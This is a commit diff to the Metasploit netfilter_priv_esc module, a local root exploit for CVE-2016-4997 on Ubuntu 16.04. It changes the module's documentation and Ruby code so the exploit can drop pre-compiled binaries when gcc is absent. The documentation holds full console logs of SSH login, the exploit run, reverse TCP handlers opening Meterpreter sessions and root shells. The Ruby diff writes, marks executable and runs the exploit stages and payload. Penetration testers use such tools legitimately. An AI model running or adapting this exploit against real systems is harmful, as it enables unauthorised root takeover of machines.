binary drops work!

documentation/modules/exploit/linux/local/netfilter_priv_esc.md

@@ -9,15 +9,14 @@ This module (and the original exploit) are written in two parts: desc, and pwn.
 There are a few requirements for this module to work (ubuntu):
 
   1. ip_tables.ko has to be loaded (root running iptables -L will do such)
-  2. libc6-dev-i386 needs to be installed to compile
-  3. shem and sham can not be installed/running
+  2. shem and sham can not be installed/running
 
 This module has been tested against:
 
   1. Ubuntu 16.04.1 (sudo apt-get install linux-image-4.4.0-21-generic)
   2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic
 
-This does not work against the following vulnerable systems.  Additional work may be required.
+This does not work against the following vulnerable systems.  Additional work may be required to the binary and C code to enable these targets.
   
   1. Fedora 24 < [kernel-4.6.3-300](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c18)
   2. Fedora 22 < [kernel-4.4.14-200](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c19)
@@ -28,7 +27,7 @@ This does not work against the following vulnerable systems.  Additional work ma
 
   1. Start msfconsole
   2. Exploit a box via whatever method
-  4. Do: `use exploit/linux/local/ubuntu_netfilter`
+  4. Do: `use exploit/linux/local/netfilter_priv_esc`
   5. Do: `set session #`
   6. Do: `set verbose true`
   7. Do: `exploit`
@@ -51,7 +50,7 @@ This does not work against the following vulnerable systems.  Additional work ma
 
 ### Ubuntu 16.04.1 (with linux-image-4.4.0-21-generic)
 
-Initial Access
+#### Initial Access
 
     msf > use auxiliary/scanner/ssh/ssh_login
     msf auxiliary(ssh_login) > set rhosts 127.0.0.1
@@ -69,68 +68,151 @@ Initial Access
     [*] Scanned 1 of 1 hosts (100% complete)
     [*] Auxiliary module execution completed
 
-Escalate
+#### Escalate
 
-    msf auxiliary(ssh_login) > use exploit/linux/local/ubuntu_netfilter
-    msf exploit(ubuntu_netfilter) > set session 1
-    session => 1
-    msf exploit(ubuntu_netfilter) > set verbose true
-    verbose => true
-    msf exploit(ubuntu_netfilter) > exploit
-    
-    [*] Started reverse TCP handler on 172.20.14.188:4444 
-    [*] Checking if libc6-dev-i386 is installed
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
     [+] libc6-dev-i386 is installed
-    [*] Checking if ip_tables.ko is loaded
+    [+] gcc-multilib is installed
+    [+] gcc is installed
+    [*] Live compiling exploit on system
+    [*] Checking if ip_tables is loaded in kernel
     [+] ip_tables.ko is loaded
     [*] Checking if shem or sham are installed
     [+] shem and sham not present.
-    [*] Writing desc executable to /tmp/452xNomE.c
+    [*] Writing desc executable to /tmp/fI1xW1Js.c
     [*] Max line length is 65537
-    [*] Writing 3484 bytes in 1 chunks of 12068 bytes (octal-encoded), using printf
-    [*] Executing /tmp/452xNomE, may take around 35s to finish.  Watching for /tmp/rrOA1xsB to be created.
+    [*] Writing 3291 bytes in 1 chunks of 11490 bytes (octal-encoded), using printf
+    [*] Executing /tmp/fI1xW1Js, may take around 35s to finish.  Watching for /tmp/GWqpwKnG to be created.
     [*] Waited 0s so far
     [*] Waited 10s so far
     [*] Waited 20s so far
     [*] Waited 30s so far
     [+] desc finished, env ready.
-    [*] Writing payload to /tmp/HbFVMTZM
+    [*] Writing payload to /tmp/Thzyfenv
     [*] Max line length is 65537
     [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
-    [*] Writing pwn executable to /tmp/eRFqvuyG.c
+    [*] Writing pwn executable to /tmp/wmfFiQKu.c
     [*] Max line length is 65537
-    [*] Writing 1418 bytes in 1 chunks of 4975 bytes (octal-encoded), using printf
+    [*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
     [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
-    [*] Sending stage (1495599 bytes) to 172.20.14.188
-    [*] Meterpreter session 2 opened (172.20.14.188:4444 -> 172.20.14.188:45114) at 2016-09-16 01:16:52 -0400
+    [*] Sending stage (1495599 bytes) to 192.168.2.137
+    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60982) at 2016-09-24 17:22:47 -0400
+    [+] Deleted /tmp/fI1xW1Js.c
+    [+] Deleted /tmp/GWqpwKnG
+    [+] Deleted /tmp/fI1xW1Js
+    [+] Deleted /tmp/Thzyfenv
+    [+] Deleted /tmp/wmfFiQKu.c
+    [+] Deleted /tmp/wmfFiQKu
     
+    meterpreter > sysinfo
+    Computer     : ubuntu
+    OS           : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
+    Architecture : x86_64
+    Meterpreter  : x86/linux
     meterpreter > getuid
     Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
 
-### Re-exploit
+#### Escalate w/ pre-compiled binaries
 
-In this scenario, we already exploit the box, for whatever reason our shell died.  So now we want to re-exploit, but we dont need to run desc again.
-
-    msf exploit(ubuntu_netfilter) > set reexploit true
-    reexploit => true
-    msf exploit(ubuntu_netfilter) > set session 2
-    session => 2
-    msf exploit(ubuntu_netfilter) > exploit
+    msf exploit(netfilter_priv_esc) > exploit
     
-    [*] Started reverse TCP handler on 172.20.14.188:4445 
-    [*] Checking if libc6-dev-i386 is installed
-    [+] libc6-dev-i386 is installed
-    [*] Checking if ip_tables.ko is loaded
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
+    [-] libc6-dev-i386 is not installed.  Compiling will fail.
+    [-] gcc-multilib is not installed.  Compiling will fail.
+    [-] gcc is not installed.  Compiling will fail.
+    [*] Dropping pre-compiled exploit on system
+    [*] Checking if ip_tables is loaded in kernel
     [+] ip_tables.ko is loaded
     [*] Checking if shem or sham are installed
     [+] shem and sham not present.
-    [*] Writing payload to /tmp/OblBUbtc
-    [*] Writing pwn executable to /tmp/u4PnMEdw.c
+    [*] Max line length is 65537
+    [*] Writing 7820 bytes in 1 chunks of 21701 bytes (octal-encoded), using printf
+    [*] Executing /tmp/8lQZGJdL, may take around 35s to finish.  Watching for /tmp/okDjTFSS to be created.
+    [*] Waited 0s so far
+    [*] Waited 10s so far
+    [*] Waited 20s so far
+    [*] Waited 30s so far
+    [+] desc finished, env ready.
+    [*] Writing payload to /tmp/2016_4997_payload
+    [*] Max line length is 65537
+    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
+    [*] Writing pwn executable to /tmp/nOO6sYqi
+    [*] Max line length is 65537
+    [*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
     [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
-    [*] Sending stage (1495599 bytes) to 172.20.14.188
-    [*] Meterpreter session 3 opened (172.20.14.188:4445 -> 172.20.14.188:40370) at 2016-09-17 13:35:57 -0400
-    [+] Deleted /tmp/OblBUbtc
-    [+] Deleted /tmp/u4PnMEdw.c
-    [+] Deleted /tmp/u4PnMEdw
-    [-] Exploit failed: Rex::TimeoutError Operation timed out.
-    [*] Exploit completed, but no session was created.
+    [*] Sending stage (1495599 bytes) to 192.168.2.137
+    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:46778) at 2016-09-24 21:24:22 -0400
+    [+] Deleted /tmp/okDjTFSS
+    [+] Deleted /tmp/2016_4997_payload
+    [+] Deleted /tmp/nOO6sYqi
+    
+    meterpreter > sysinfo
+    Computer     : ubuntu
+    OS           : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
+    Architecture : x86_64
+    Meterpreter  : x86/linux
+    meterpreter > getuid
+    Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
+
+#### Re-exploit
+
+In this scenario, we already exploit the box, for whatever reason our shell died.  So now we want to re-exploit, but we dont need to run desc again.
+
+    msf exploit(netfilter_priv_esc) > set reexploit true
+    reexploit => true
+    msf exploit(netfilter_priv_esc) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
+    [+] libc6-dev-i386 is installed
+    [+] gcc-multilib is installed
+    [+] gcc is installed
+    [*] Live compiling exploit on system
+    [*] Checking if ip_tables is loaded in kernel
+    [+] ip_tables.ko is loaded
+    [*] Checking if shem or sham are installed
+    [+] shem and sham not present.
+    [*] Writing payload to /tmp/egMfQrrI
+    [*] Max line length is 65537
+    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
+    [*] Writing pwn executable to /tmp/Yf8CAdMu.c
+    [*] Max line length is 65537
+    [*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
+    [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+    [*] Sending stage (1495599 bytes) to 192.168.2.137
+    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60984) at 2016-09-24 17:29:06 -0400
+    [+] Deleted /tmp/egMfQrrI
+    [+] Deleted /tmp/Yf8CAdMu.c
+    [+] Deleted /tmp/Yf8CAdMu
+    
+    meterpreter > 
+
+#### Re-exploit w/ pre-compiled binaries
+
+    msf exploit(netfilter_priv_esc) > set reexploit true
+    reexploit => true
+    msf exploit(netfilter_priv_esc) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
+    [+] libc6-dev-i386 is installed
+    [-] gcc-multilib is not installed.  Compiling will fail.
+    [-] gcc is not installed.  Compiling will fail.
+    [*] Dropping pre-compiled exploit on system
+    [*] Checking if ip_tables is loaded in kernel
+    [+] ip_tables.ko is loaded
+    [*] Checking if shem or sham are installed
+    [+] shem and sham not present.
+    [*] Writing payload to /tmp/2016_4997_payload
+    [*] Max line length is 65537
+    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
+    [*] Writing pwn executable to /tmp/SZrv2NOR
+    [*] Max line length is 65537
+    [*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
+    [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+    [*] Sending stage (1495599 bytes) to 192.168.2.137
+    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60996) at 2016-09-24 20:47:03 -0400
+    
+    meterpreter > 

modules/exploits/linux/local/netfilter_priv_esc.rb

@@ -344,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Local
     pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/,
                "execl(\"#{payload_path}\", NULL);")
 
-    def pwn(payload_path, pwn_file, pwn)
+    def pwn(payload_path, pwn_file, pwn, compile)
       # lets write our payload since everythings set for priv esc
       vprint_status("Writing payload to #{payload_path}")
       write_file(payload_path, generate_payload_exe)
@@ -352,43 +352,55 @@ class MetasploitModule < Msf::Exploit::Local
       register_file_for_cleanup(payload_path)
 
       # now lets drop part 2, and finish up.
-      print_status "Writing pwn executable to #{pwn_file}.c"
       rm_f pwn_file
-      rm_f "#{pwn_file}.c"
-      write_file("#{pwn_file}.c", pwn)
-      cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}")
-      register_file_for_cleanup("#{pwn_file}.c")
+      if compile
+        print_status "Writing pwn executable to #{pwn_file}.c"
+        rm_f "#{pwn_file}.c"
+        write_file("#{pwn_file}.c", pwn)
+        cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}")
+        register_file_for_cleanup("#{pwn_file}.c")
+      else
+        print_status "Writing pwn executable to #{pwn_file}"
+        write_file(pwn_file, pwn)
+      end
       register_file_for_cleanup(pwn_file)
       cmd_exec("chmod +x #{pwn_file}; #{pwn_file}")
     end
 
     if not compile # we need to override with our pre-created binary
       # pwn file
-      path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-2')
+      path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')
       fd = ::File.open( path, "rb")
       pwn = fd.read(fd.stat.size)
       fd.close
       # desc file
-      path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-1')
+      path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')
       fd = ::File.open( path, "rb")
       decr = fd.read(fd.stat.size)
       fd.close
+
+      # overwrite the hardcoded variable names in the compiled versions
+      env_ready_file = '/tmp/okDjTFSS'
+      payload_path = '/tmp/2016_4997_payload'
     end
 
     # check for shortcut
     if datastore['REEXPLOIT']
-      pwn(payload_path, pwn_file, pwn)
+      pwn(payload_path, pwn_file, pwn, compile)
     else
-      print_status "Writing desc executable to #{desc_file}.c"
-      rm_f env_ready_file
-      rm_f "#{desc_file}.c"
       rm_f desc_file
-      write_file("#{desc_file}.c", decr)
-      output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}")
-
+      if compile
+        print_status "Writing desc executable to #{desc_file}.c"
+        rm_f "#{desc_file}.c"
+        write_file("#{desc_file}.c", decr)
+        register_file_for_cleanup("#{desc_file}.c")
+        output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}")
+      else
+        write_file(desc_file, decr)
+      end
+      rm_f env_ready_file
       register_file_for_cleanup(env_ready_file)
-      register_file_for_cleanup("#{desc_file}.c")
-      register_file_for_cleanup(desc_file)
+      #register_file_for_cleanup(desc_file)
       if not file_exist?(desc_file)
         vprint_error("gcc failure output: #{output}")
         fail_with(Failure::Unknown, "#{desc_file}.c failed to compile")
@@ -409,7 +421,7 @@ class MetasploitModule < Msf::Exploit::Local
 
         if file_exist?(env_ready_file)
           print_good("desc finished, env ready.")
-          pwn(payload_path, pwn_file, pwn)
+          pwn(payload_path, pwn_file, pwn, compile)
           return
         end
         sec_waited +=1